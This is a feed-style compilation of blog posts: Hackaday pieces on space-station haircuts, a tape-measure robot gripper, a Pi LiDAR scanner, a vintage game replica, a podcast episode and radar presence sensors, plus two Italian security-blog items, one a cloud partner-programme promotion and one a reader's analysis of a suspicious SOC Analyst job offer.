youtube.com/embed/1Y2ao4gwWqg?…
Haircuts in Space: How to Keep Your Astronauts Looking Fresh
Although we tend to see mostly the glorious and fun parts of hanging out in a space station, the human body will not cease to do its usual things, whether it involves the digestive system, or even something as mundane as the hair that sprouts from our heads. After all, we do not want our astronauts to return to Earth after a half-year stay in the ISS looking as if they got marooned on an uninhabited island. Introducing the onboard barbershop on the ISS, and the engineering behind making sure that after a decade the ISS doesn’t positively look like it got the 1970s shaggy wall carpet treatment.
The basic solution is rather straightforward: an electric hair clipper attached to a vacuum that will whisk the clippings safely into a container rather than being allowed to drift around. In a way this is similar to the vacuums you find on routers and saws in a woodworking shop, just with more keratin rather than cellulose and lignin.
On the Chinese Tiangong space station they use a similar approach, with the video showing how simple the system is, little more than a small handheld vacuum cleaner attached to the clippers. Naturally, you cannot just tape the vacuum cleaner to some clippers and expect it to get most of the clippings, which is where both the ISS and Tiangong solutions seems to have a carefully designed construction to maximize the hair removal. You can see the ISS system in action in this 2019 video from the Canadian Space Agency.
Of course, this system is not perfect, but amidst the kilograms of shed skin particles from the crew, a few small hair clippings can likely be handled by the ISS’ air treatment systems just fine. The goal after all is to not have a massive expanding cloud of hair clippings filling up the space station.
Robot Picks Fruit and Changes Light Bulbs with Measuring Tape
How far can you stretch a measuring tape before it buckles? The answer probably depends more on the tape than the user, but it does show how sturdy the coiled spring steel rulers can be. [Gengzhi He et. al.] may have been playing that game in the lab at UC San Diego when they hit upon the idea for a new kind of low-cost robotic gripper.
With the lovely backronym “GRIP-tape” — standing for Grasping and Rolling in Plane — you get a sense for what this effector can do. Its two “fingers” are each made of loops of doubled-up measuring tape bound together with what looks suspiciously like duck tape. With four motors total, the fingers can be lengthened or shortened by spooling the tape, allowing a reaching motion, pivot closer or further apart for grasping, and move-in-place like conveyor belts, rotating the object in their grasp.
The combination means it can reach out, grab a light bulb, and screw it into a socket. Or open and decant a jar of spices. Another video shows the gripper reaching out to pick a lemon, and gently twist it off the tree. It’s quite a performance for a device with such modest components.
At the moment, the gripper is controlled via remote; the researchers plan on adding sensors and AI autonomous control. Read all the details in the preprint, or check below the fold to watch the robot in action.
This is hardly the first time we’ve highlighted a grabby robot. We’ve seen belts, we’ve seen origami — but this is the first time we’ve seen a measuring tape. Have you seen a cool robot? Toss us a tip. We’d love to hear from you.
youtube.com/embed/l0mCA19y0zQ?…
youtube.com/embed/SP7X8TpNhmw?…
Tip of the hat to reader [anonymouse] for pointing this one out.
Scopri il Partner Program di Cubbit per MSP
Se sei un Managed Service Provider (MSP) o un Consulente IT, c’è una nuova opportunità che potrebbe rivoluzionare il tuo business: il Programma Partner di Cubbit.
Perché scegliere il Programma Partner di Cubbit
Cubbit, pioniere del cloud geo-distribuito in Europa, ha sviluppato un Programma Partner esclusivo pensato per aiutarti a distinguerti nel mercato competitivo di oggi. Questa iniziativa non solo ti permette di moltiplicare i tuoi margini di profitto fino a tre volte rispetto alla media del settore, ma offre anche una serie di vantaggi unici progettati per sostenere la tua crescita e quella dei tuoi clienti.
I vantaggi che ti aspettano
- Massimizza i tuoi profitti: Grazie a condizioni commerciali vantaggiose e tariffe altamente competitive, avrai l’opportunità di aumentare significativamente i tuoi margini.
- Supporto dedicato di alto livello: Beneficia di assistenza tecnica specializzata, supporto commerciale personalizzato e strumenti avanzati di co-marketing per espandere la tua presenza sul mercato.
- Pannello di controllo avanzato: Una dashboard intuitiva ti consente di monitorare l’utilizzo dello spazio da parte dei tuoi clienti, generare report dettagliati e personalizzare la console per una gestione più efficiente.
- Accesso al Partner Portal: Accedi a risorse esclusive come il sistema di registrazione dei deal che premia le tue vendite e kit di marketing preconfezionati per lanciare campagne promozionali in tempi record.
- Formazione e certificazioni: Partecipa a programmi formativi certificati sulla tecnologia Cubbit per acquisire competenze avanzate e offrire soluzioni di alto livello ai tuoi clienti.
Cubbit: il cloud geo-distribuito per MSP
Dal 2016, Cubbit ha rivoluzionato il concetto di cloud storage, guadagnando la fiducia di oltre 350 aziende in Europa, tra cui marchi rinomati come Exclusive Networks, Leonardo, Granarolo, Amadori e numerose pubbliche amministrazioni.
Una tecnologia unica
Cubbit si distingue per la sua architettura geo-distribuita. Questo approccio innovativo offre un livello di sicurezza senza precedenti:
- Cifratura AES-256: I tuoi dati vengono cifrati con uno standard crittografico di livello militare.
- Frammentazione e ridondanza: I dati cifrati vengono suddivisi in frammenti e replicati per garantire la massima sicurezza.
- Geo-distribuzione: I dati cifrati e frammentati vengono replicati su più sedi geografiche all’interno di un Paese scelto da te. Questo distingue Cubbit: i dati non risiedono mai in un unico luogo, assicurando sovranità digitale e un livello di resilienza senza precedenti.
Conformità e sovranità digitale
Cubbit è pienamente conforme alle normative europee come GDPR e NIS2. La tecnologia di geofencing permette di specificare esattamente dove i dati devono essere conservati, rispettando i requisiti di sovranità nazionale. Questo significa offrire ai tuoi clienti una soluzione cloud sicura e iper-resiliente, capace di resistere ad attacchi ransomware e disastri naturali senza compromessi in termini di sovranità e conformità alle normative.
Cubbit ha inoltre ottenuto prestigiose certificazioni internazionali, tra cui:
- ISO 9001:2015 (Gestione della qualità)
- ISO/IEC 27001:2013 (Sicurezza delle informazioni)
- ISO/IEC 27017:2015 (Sicurezza nel cloud)
- ISO/IEC 27018:2019 (Protezione dei dati personali nel cloud)
Inoltre, Cubbit è stata insignita del marchio “Cybersecurity Made in Europe” ed è qualificata ACN, rendendo i suoi servizi disponibili per le istituzioni pubbliche tramite la piattaforma MePa.
Sicurezza di livello superiore
Con una durabilità dei dati fino a 15 9, Cubbit offre una protezione diecimila volte superiore rispetto ai tradizionali servizi cloud. L’architettura geo-distribuita elimina il rischio di downtime e punti di vulnerabilità unici. Anche in caso di interruzione di uno dei nodi della rete, i dati rimangono sempre accessibili grazie alla ridistribuzione automatica dei frammenti.
Funzionalità come il versionamento e il blocco degli oggetti proteggono ulteriormente i dati:
- Versionamento: Conserva diverse versioni di un file, facilitando il ripristino in caso di attacchi ransomware senza necessità di pagare riscatti.
- Blocco degli oggetti: Impedisce modifiche o eliminazioni non autorizzate per un periodo di tempo definito dall’utente.
Flessibilità ed efficienza senza sorprese
Compatibile con il protocollo S3, Cubbit permette un’integrazione immediata senza modificare software o processi esistenti. Offre inoltre backup automatici off-site e opzioni di archiviazione a lungo termine, garantendo efficienza operativa senza costi nascosti come le egress fee. La trasparenza tariffaria assicura prevedibilità nei costi.
Entra a far parte del Programma Partner di Cubbit
Questa è l’occasione per i Consulenti IT e gli MSP italiani di distinguersi sul mercato con una soluzione cloud innovativa e interamente sviluppata in Italia. Aumenta i tuoi margini, rafforza la tua competitività e offri ai tuoi clienti un servizio cloud più sicuro, iper-resiliente e conforme alle normative.
Contatta Cubbit oggi stesso per scoprire come aderire al Programma Partner di Cubbit e portare il tuo business al livello successivo.
L'articolo Scopri il Partner Program di Cubbit per MSP proviene da il blog della sicurezza informatica.
A Pi-Based LiDAR Scanner
Although there are plenty of methods for effectively imaging a 3D space, LiDAR is widely regarded as one of the most effective methods. These systems use a rapid succession of laser pulses over a wide area to create an accurate 3D map. Early LiDAR systems were cumbersome and expensive but as the march of time continues on, these systems have become much more accessible to the average person. So much so that you can quickly attach one to a Raspberry Pi and perform LiDAR imaging for a very reasonable cost.
This software suite is a custom serial driver and scanning system for the Raspberry Pi, designed to work with LDRobot LiDAR modules like the LD06, LD19, and STL27L. Although still in active development, it offers an impressive set of features: real-time 2D visualizations, vertex color extraction, generation of 360-degree panoramic maps using fisheye camera images, and export capabilities for integration with other tools. The hardware setup includes a stepper motor for quick full-area scanning, and power options that include either a USB battery bank or a pair of 18650 lithium cells—making the system portable and self-contained during scans.
LiDAR systems are quickly becoming a dominant player for anything needing to map out or navigate a complex 3D space, from self-driving cars to small Arduino-powered robots. The capabilities a system like this brings are substantial for a reasonable cost, and we expect to see more LiDAR modules in other hardware as the technology matures further.
Thanks to [Dirk] for the tip!
Vintage Game Rides Again Thanks to Modern Tech
You have to admire the lengths designers went to back in the day to create engaging games and toys. One particularly clever game of this type was called GEE-WIZ, a horse racing game from the 1920s that seems like it might have been right at home at a bar or pub, and that caught [Michael Gardi]’s imagination enough that he built a modern version of the game.
GEE-WIZ imitates a horse race with an extremely clever mechanism powered by a flywheel on a square shaft. Play is started by pulling a ripcord, which spins up the flywheel to shoot steel balls up six tracks in a gently sloped playing field. The balls hit tin horses riding in each track, pushing them ever further up the track until they trip a flag to indicate the winner. We can practically hear the cheers.
As with many of his other retro-reimaginings, [Mike]’s 21st-century version of GEE-WIZ focuses on capturing the look and feel of the original as accurately as possible. To that end, he put a lot of work into the 3D prints that form the playing field, as well as labels that adorned the original. But the game wouldn’t be much good without the drive mechanism, so [Mike] had to put some work into reverse-engineering the flywheel. He had that machined out of stainless steel and mounted it to the base with some chunky printed bearing blocks. You can see the final product in the brief video below.
[Mike] says that vintage toy recreations aren’t exactly his usual fare, but some might argue that the Sol-20 and Minivac 601 very much count as toys. Either way, we really like the simplicity of GEE-WIZ and the quality of [Mike]’s reproduction.
youtube.com/embed/6-spGLCaLj0?…
Hackaday Podcast Episode 317: Quantum Diamonds, Citizen Science, and Cobol to AI
When Hackaday editors Elliot Williams and Al Williams need a break from writing posts, they hop on the podcast and talk about their favorite stories of the past week. Want to know what they were talking about? Listen in below and find out!
In an unusual twist, a listener sent in the sound for this week’s What’s This Sound competition, so it turns out Elliot and Al were both stumped for a change. See if you can do better, and you might just score a Hackaday Podcast T-shirt.
On the hacking front, the guys talked about what they hope to see as entries in the pet hacking contest, quantum diamonds (no kidding), spectrometers, and several science projects.
There was talk of a tiny robot, a space mouse—the computer kind, not a flying rodent—and even an old-fashioned photophone that let Alexander Graham Bell use the sun like a string on a paper cup telephone.
Things really heat up at the end, when there is talk about computer programming ranging from COBOL to Vibe programming. In case you’ve missed it, vibe coding is basically delegating your work to the AI, but do you really want to? Maybe, if your job is to convert all that old COBOL code.
Want to read along? The links are below. Be sure to leave your robot plans, COBOL war stories, and AI-generated Vibe limerics in the comments!
html5-player.libsyn.com/embed/…
As always, the human-generated Hackaday Podcast is available as a DRM-free MP3 download.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 317 Show Notes:
News:
What’s that Sound?
- Want to win a Hackaday Podcast t-shirt? Send in your guess!
Interesting Hacks of the Week:
- Shine On You Crazy Diamond Quantum Magnetic Sensor
- Quantum Sensor Uses Synthetic Diamond
- Quantum Diamond Explainer if you want to learn more
- GPS Broken? Try TV!
- SpaceMouse Destroyed For Science
- Tiny Pogo Robot Gets Wings, Does Flips
- Replica Of 1880 Wireless Telephone Is All Mirrors, No Smoke
- A Brief History Of Optical Communication
- Hackaday Explains: Li-Fi & Visible Light Communications
- Popular Electronics
- DIY Scanning Spectrometer Is A Bright Idea
Quick Hacks:
- Elliot’s Picks:
- Budget Schlieren Imaging Setup Uses 3D Printing To Reveal The Unseen
- An Absolute Zero Of A Project
- GK STM32 MCU-Based Handheld Game System
- Al’s Picks:
- Audio Effects Applied To Text
- Tracing The #!: How The Linux Kernel Handles The Shebang
- DIY Soldering Tweezers, Extra Thrifty
Can’t-Miss Articles:
hackaday.com/2025/04/18/hackad…
AAA SOC Analyst cercarsi: quando le offerte di lavoro sono poco chiare e trasparenti e bisogna prestare attenzione
Autore: Nicola Tarlini, Cyber Security Engineer
Nicola, ci ha inviato una dettagliata segnalazione riguardante una comunicazione sospetta relativa a un’offerta di lavoro per la posizione di SOC Analyst e ha voluto condividere le sue osservazioni con un’analisi dei fatti. Premettiamo che soprattutto nell’ambito della sicurezza informatica bisogna prestare particolare attenzione alle offerte di lavoro poco chiare e trasparenti – anche se non rappresentano una truffa – soprattutto perché la sicurezza informatica è un settore critico e le aziende del settore devono attrarre talenti altamente qualificati per fronteggiare minacce sempre più complesse e frequenti.
Nel primo caso – offerte di lavoro poco chiare o ambigue, con contatti non verificabili o informazioni contraddittorie – dovrebbero far alzare il livello dell’attenzione, come è stato per ha fatto Nicola Tarlini. Spesso infatti questi annunci potrebbero nascondere infatti rischi di truffa, furto di dati personali o violazioni di sicurezza: Nicola infatti ha chiesto chiarezza per proteggere sia la propria integrità professionale e digitale e per evitare di cadere vittima di eventuali frodi.
Nel minore dei mali invece offerte poco trasparenti o superficiali possono indicare mancanza di professionalità, di attenzione o una gestione non ottimizzata dei processi di assunzione e nella preparazione del proprio personale, con il conseguente rischio di impiego in ambienti non sicuri o poco affidabili, che possono compromettere la carriera e la sicurezza personale. Anche in questo caso la segnalazione di Nicola vuole fare chiarezza. Nella sua analisi evidenzia vari segnali di allarme tra cui messaggi impersonali e generici, identità dei recruiter non verificabili, mancanza di informazioni chiare, contatti telefonici a cui nessuno risponde o non attivi, discrepanze tra l’annuncio di lavoro e i messaggi successivi di contatto ed infine una risposta ufficiale dell’azienda che ammette una comunicazione poco chiara ma che conferma l’attività dei contatti.
Qui sotto una tabella dove vengono riassunte le caratteristiche sospette di un’offerta di lavoro per la maggior parte coerenti con l’analisi di Nicola che segue.
L’analisi di Nicola Tardini su un’offerta di lavoro come SOC Analyst generico
Qualche giorno fa, l’account di un utente di LinkedIn con ruolo “recruiter” mi ha contattato per una proposta di lavoro come “SOC Analyst”generico sia in 8×5 che in 24×7 su turni.
L’utente in questione, del quale nascondo l’identità per questioni di privacy, sopra citato mi ha contattato con il seguente messaggio:
In questo messaggio ho notato fin da subito dei segnali di allarme che vado ad elencare:
- L’inizio del messaggio è un asettico e impersonale “Buongiorno!”. Questo fa pensare che si tratti di un messaggio automatico o preimpostato, non di un messaggio personale a seguito di un’attenta analisi del mio profilo.
- L’utente si presenta con un’identità diversa da quella con cui scrive:“Piacere di conoscerti! Sono Anna, collega di [NOME CENSURATO].”. Questo porta a pensare due possibili ipotesi:
- a. L’utenza è compromessa: quindi è stato commesso un reato informatico;
- b. L’utenza è condivisa: quindi non viene rispettato alcuno standard di sicurezza riguardante le comunicazioni online, perciò una violazione delle regole di condotta di LinkedIn e procedure aziendali non conformi a leggi e standard nazionali e internazionali.
- Nel messaggio del punto 2 non viene dichiarato il cognome di questa presunta recruiter di nome “Anna”. Questo porta a pensare che l’utente non voglia identificarsi e, quindi, che l’opzione 2.a sia quella più corretta.
- L’utente dichiara “siamo [AZIENDA CENSURATA]” > non qualificandosi personalmente come Recruiter per conto della società, quindi una dipendente, i sospetti continuano ad essere presenti e l’allarme è costantemente attivo su chi sia “Anna”.
- Il titolo del lavoro per cui risulta cercare l’utente nel messaggio segnalato è “SOC Analyst (H8 e H24, livello 1 e 2)”, però è diverso da quanto presentato sul profilo LinkedIn aziendale utilizzato per il contatto: Inoltre, sono 2 mesi di tempo che l’annuncio è presente. Queste informazioni fannocredere che l’utente in questione non riesca a trovare la persona giusta a distanza di tempo. Viene da pensare, anche, che l’annuncio non sia stato aggiornato a differenza del messaggio della chat.
6. Viene scritto “La posizione è a contratto con un tipo di workplace ibrido, con sede a Milano”. Non viene definita la tipologia di contratto: somministrazione, tempo determinato, tempo indeterminato, a chiamata o altro.
7. Nella firma non si parla di “Anna” ma viene scritto“per conto di”. Questo conferma ancora una volta i sospetti del punto 2.
Quindi, visto quanto sospetto il primo messaggio, ho deciso di chiedere qualche modalità per confermare l’identità:
L’esito della verifica di tali dati è stato molto deludente e ha alzato ulteriormente imiei sospetti:
- Il numero di telefono fisso ha squillato a vuoto e non ho ricevuto alcuna risposta, nonostante 4 tentativi tra le 3:48 p.m. e le 4:07 p.m. (ora italiana).
- Il numero del cellulare risulta invece non attivo;
- L’indirizzo mail contiene un“cognome”che non corrisponde o non è verificabile con i dati forniti in precedenza nella chat di Linkedin.
Volendo approfondire ulteriormente, ho verificato che l’utente cercava di presentarsi con l’identità di “Anna [CENSURATO]”. Questa risulta essere una Junior Recruiter che lavora presso la società indicata nell’annuncio di lavoro e durante il contatto. Questa ragazza risulta aver concluso da pochi giorni un master con un Academy specifico per recruiter e risulta aver pubblicizzato, una settimana prima, la posizione di assunzione per cui sono stato contattato.
Questo porta a credere che la società in questione non faccia formazione in ambito di Security ai propri Recruiter e, quindi, di non rispettare le leggi nazionali e internazionali in ambito. È stato contattato l’indirizzo “privacv@[CENSURATO].it” per segnalare il tutto e chiedere ulteriore conferma di tali comportamenti sospetti e la risposta è stata la seguente:
L'articolo AAA SOC Analyst cercarsi: quando le offerte di lavoro sono poco chiare e trasparenti e bisogna prestare attenzione proviene da il blog della sicurezza informatica.
Presence Detection Augments 1930s Home
It can be jarring to see various sensors, smart switches, cameras, and other technology in a house built in the 1930s, like [Chris]’s was. But he still wanted presence detection so as to not stub any toes in the dark. The result is a sensor that blends in with the home’s aesthetics a bit better than anything you’re likely to find at the Big Box electronics store.
For the presence detection sensors, [Chris] chose to go with 24 GHz mmwave radar modules that, unlike infrared sensors, can detect if a human is in an area even if they are incredibly still. Paired with the diminutive ESP32-S2 Mini, each pair takes up very little real estate on a wall.
The radar module and ESP pair are set up with some code to get them running in Home Assistant, which [Chris] has provided on the project’s page. With everything up and running he has a module that can control lights without completely changing the aesthetic or behavior of his home. If you’re still using other presence sensors and are new to millimeter wave radar, take a look at this project for a good guide on getting started with this fairly new technology.